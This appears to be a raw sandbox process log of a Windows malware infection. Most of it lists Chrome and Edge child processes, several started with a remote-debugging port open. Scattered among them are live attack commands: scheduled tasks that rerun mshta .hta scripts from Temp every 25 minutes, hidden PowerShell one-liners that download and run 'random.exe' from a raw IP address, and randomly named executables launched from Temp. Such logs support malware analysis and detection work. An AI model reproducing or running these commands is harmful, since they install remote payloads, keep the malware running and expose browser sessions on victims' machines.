"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2400 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4508,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4488,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4452 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10109460101\a4f9d6c063.exe

"C:\Users\Admin\AppData\Local\Temp\10109460101\a4f9d6c063.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn DDRIJmagX0m /tr "mshta C:\Users\Admin\AppData\Local\Temp\L2Zsbgj3b.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\L2Zsbgj3b.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn DDRIJmagX0m /tr "mshta C:\Users\Admin\AppData\Local\Temp\L2Zsbgj3b.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4868,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5172 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5232,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5224 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4900,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5100 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10109470121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE

"C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff204946f8,0x7fff20494708,0x7fff20494718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,5117724200206287251,5869402831868372738,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,5117724200206287251,5869402831868372738,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,5117724200206287251,5869402831868372738,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1944,5117724200206287251,5869402831868372738,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1944,5117724200206287251,5869402831868372738,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1944,5117724200206287251,5869402831868372738,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1944,5117724200206287251,5869402831868372738,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "N3vpsma9m1L" /tr "mshta \"C:\Temp\GIMutnySB.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\GIMutnySB.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe

"C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe

"C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff2266cc40,0x7fff2266cc4c,0x7fff2266cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1996,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1900,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2028 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2432 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe

"C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4412,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4532 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3140,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4404 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4264,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4272 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4468,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4640 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4532,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5020 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4896,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3656 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4892 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5132 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3760,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4868,i,17833763596034477193,16235561884790951981,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5128 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109610101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10109610101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff249e46f8,0x7fff249e4708,0x7fff249e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2900 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4884 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2560 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

